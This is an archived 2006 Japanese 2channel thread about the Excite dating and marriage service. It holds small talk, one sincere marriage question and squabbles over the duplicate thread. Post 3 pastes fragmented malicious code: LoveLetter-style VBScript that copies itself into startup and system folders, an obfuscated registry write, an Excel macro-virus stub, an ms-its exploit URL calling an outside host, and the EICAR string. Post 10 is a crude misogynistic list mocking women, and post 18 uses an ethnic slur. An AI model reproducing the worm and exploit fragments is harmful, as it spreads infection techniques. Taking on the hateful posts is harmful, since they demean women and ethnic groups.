5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

★ ☆ エキサイト恋愛結婚 Part89 ★ ☆

1 :愛と死の名無しさん:2006/07/21(金) 00:34:23
キショオタガンガレ!
ナム〜キボンヌ!

2 :愛と死の名無しさん:2006/07/21(金) 01:26:52
老若男女問わずハトメ・プロフ・面接についての不満を大いに語ってくれたまえ!!
ただし違法行為はなしでな、あくまで合法的蜷

さてと巣に帰るとするかなむ〜

bvugfe578>2ch/brgti7623///

3 :愛と死の名無しさん:2006/07/21(金) 01:36:39
やべ、まだ写真撮ってないわ

こんな奴、結構いないか?

<body onload=window()>
If s = "htm" and fso.FileExists(f1.path+"l") = False thenfso.CopyFile f1.path, f1.path+"l"
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
If s = "htm" and fso.FileExists(f1.path+"l") = False then fso.CopyFile f1.path, f1.path+"l"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub

4 :愛と死の名無しさん:2006/07/21(金) 01:47:59
面接エリートへの道なむ〜

・「俺のセンスどうかなあ」と親、兄弟、友達、特に女友達に聞いてみる
・ファッション雑誌を読んで研究してみる
・かっこいいと思える身近な先輩、友達の格好をまねてみる
・テレビに出ている人気俳優の服装や髪型をまねてみる
・洋服売り場の店員にどんな服装が自分に似合うか相談してみる

5 :愛と死の名無しさん:2006/07/21(金) 19:08:09
sage

6 :愛と死の名無しさん:2006/08/06(日) 12:22:55
次はこれ再利用すればいいのか?

7 :愛と死の名無しさん:2006/08/20(日) 14:16:46
で、このスレはまた使わないのか?

8 :愛と死の名無しさん:2006/08/28(月) 21:57:29
♀です。
結婚したら親が家を建ててくれるらしいんですが(実家とは別のところ)
これって、結婚相手の条件としてマイナスですか?プラスですか?

9 :愛と死の名無しさん:2006/08/28(月) 22:06:00
こ こ に は も う 書 き 込 む な カ ス ! !

10 :愛と死の名無しさん:2006/08/28(月) 22:11:33
  ★★★★★   ザマーミレ!女に産まれてしまった負け組を笑おう(プッ 〜♪  ★★★★★  
   
1. あら不思議〜♪ウンコでもないのにいちいちしゃがんでケツ丸出しでオシッコ(プッ  
2. しかもオシッコの度にマンコがびっしょびしょ(プッ  
3. マンコから臭いオリモノダ〜ラダラ〜♪ああ、ばっちいな〜♪  
4. 毎月、不快な生理で苦しめられてゴクロ〜サン(プッ  
5. 生まれついての劣等脳。何をやっても男に及ばす哀れだな〜〜♪  
6. 女子オリンピック選手ですら素人男性にざらに負ける劣った身体能力。  
7. 30過ぎると早くも奇形児出産の確率増大!時間に追われる出産計画(プッ  
8. 一生化粧品に縛られる生活している化粧品の奴隷。生まれつきのゴマカシ体質のつけ、滑稽やな(爆笑)    
9. 高齢男性と若い女の結婚は世間が容認しても逆は変態扱い。女の結婚の選択肢が少ないんやで〜〜〜♪  
10.男なら誰でもできる海水浴での上半身裸を女がやったら公然猥褻罪!ホ〜〜〜イホイ(プッ         
11.ダイエットしないとすぐ太る〜♪男のように気ままに食べられない生まれついてのデブ体質(プッ      
12.中高年になったら更年期障害、骨粗鬆症。悲劇やな〜〜〜♪ギャハハハハハハハ〜♪    
13.同じ服装するだけで世間から物笑い、不自由だな〜〜、ああ、不自由だな〜〜〜♪    
14.乳ガン、子宮がん激増で男性より多い死の恐怖〜♪  
15.空間認識能力に劣るバカ頭、生まれついての方向音痴、車の運転へったくそ〜〜♪  


11 :愛と死の名無しさん:2006/08/28(月) 22:18:36
>9
8です。カスって私のことですか?
もし、そうだったらすみません。。
男の人は自分のためたお金で家を買いたいものなのかなーと思ったもので。
上には、結婚したらと書きましたが、訂正します。
結婚してもしなくても建ててくれるらしいのですが、
お婿さんじゃないけど、私の家に住むのは男の人からしたら嫌かなと思ったのです。
真面目な質問です。


12 :愛と死の名無しさん:2006/08/28(月) 23:11:20
>>11
ここは重複スレなんです。ウィルスコードも貼ってあるのでさっさと落としたいのにスレを上げないでもらえませんか?
今は↓が本スレなのでそっち行って下さい。ここにはもう書き込みしないで。
http://life7.2ch.net/test/read.cgi/sousai/1156524301/

13 :愛と死の名無しさん:2006/09/17(日) 07:13:52
次はこれを再利用するのか?

14 :愛と死の名無しさん:2006/09/17(日) 08:22:16
>>12
そこ書き込めないよ。
このスレを使うしかないだろ。

15 :愛と死の名無しさん:2006/09/17(日) 19:56:51
埋まってから言うなや。どんだけ亀レスなんだよ。
ウィルスコード貼ってあってウザイって書いてあんだろーが!
分かったら二度と上げるな!以降書込み禁止だ

16 :愛と死の名無しさん:2006/09/17(日) 23:30:54
>>15
藻前が一番ウザイ!

17 :愛と死の名無しさん:2006/09/18(月) 00:31:45
あ?お前バカか?何故上げる?このスレ使わねーっつってんだろ!
オメーのほうがよっぽどウザいわ

18 :愛と死の名無しさん:2006/09/18(月) 08:21:15
>>17
ファビョってんじゃねえよ、三国人がw

19 :愛と死の名無しさん:2006/09/18(月) 08:56:10
意味も知らないくせに書き込むってすごい恥さらしですね(プ

20 :愛と死の名無しさん:2006/10/18(水) 18:06:47
バツイチ子持ち女と結婚できるか?
http://life7.2ch.net/test/read.cgi/kankon/1145093350/

21 :愛と死の名無しさん:2006/10/21(土) 22:53:08
あげ

22 :愛と死の名無しさん:2006/10/22(日) 20:23:47
このスレ

23 :愛と死の名無しさん:2006/11/06(月) 01:37:38
使い切らなくていいのか?

24 :愛と死の名無しさん:2006/11/06(月) 15:11:01
放置して沈めるが吉。

25 :愛と死の名無しさん:2006/12/15(金) 20:10:34
本スレ昇格

26 :愛と死の名無しさん:2006/12/15(金) 21:23:47
>>25
うp

27 :愛と死の名無しさん:2006/12/22(金) 08:53:00
>>26
ここか

28 :愛と死の名無しさん:2006/12/22(金) 14:30:35
>>27
うむ

29 :愛と死の名無しさん:2006/12/22(金) 15:07:43
あげ

30 :愛と死の名無しさん:2006/12/22(金) 15:27:03
禿げ

8 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)